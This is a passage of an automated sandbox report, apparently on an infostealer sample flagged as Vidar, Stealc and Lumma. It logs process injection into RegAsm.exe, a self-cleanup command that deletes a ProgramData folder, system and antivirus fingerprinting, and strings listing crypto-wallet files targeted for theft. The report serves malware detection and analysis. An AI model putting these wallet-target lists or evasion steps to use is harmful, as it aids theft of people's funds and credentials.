Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1156008

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KECBKKEBKE.exe "C:\ProgramData\KECBKKEBKE.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\EGDGCGCFHI.exe "C:\ProgramData\EGDGCGCFHI.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\DBGIJEHIID.exe "C:\ProgramData\DBGIJEHIID.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FIJKEHJJDAAK" & exit	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGIEGHJEGHJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIJEGDBGDBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userGIEGHJEGHJ.exe "C:\Users\userGIEGHJEGHJ.exe"
Source: C:\Users\userGIEGHJEGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userIJEGDBGDBF.exe "C:\Users\userIJEGDBGDBF.exe"
Source: C:\Users\userIJEGDBGDBF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040111D cpuid

3_2_0040111D

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0042B21C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_0042B311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_0042B3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_0042B413
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0042AC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_00425533
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0042B5E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_004275EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_004276C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesA,	3_2_0042B6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429EBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_0042E6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_0042B773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_00428F14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B737
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	3_2_0042E7F4

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Queries volume information: C:\ProgramData\KECBKKEBKE.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Queries volume information: C:\ProgramData\EGDGCGCFHI.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Queries volume information: C:\ProgramData\DBGIJEHIID.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\userGIEGHJEGHJ.exe	Queries volume information: C:\Users\userGIEGHJEGHJ.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\userIJEGDBGDBF.exe	Queries volume information: C:\Users\userIJEGDBGDBF.exe VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041C110 lstrcpyA,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,

3_2_0041C110

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: RegAsm.exe, 00000003.00000002.2595193937.000000000148A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2863943868.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.00000000012BB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 15.2.DBGIJEHIID.exe.39c5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DBGIJEHIID.exe.39c5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.3023059126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2576073985.00000000039C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ce5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ce5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 424, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
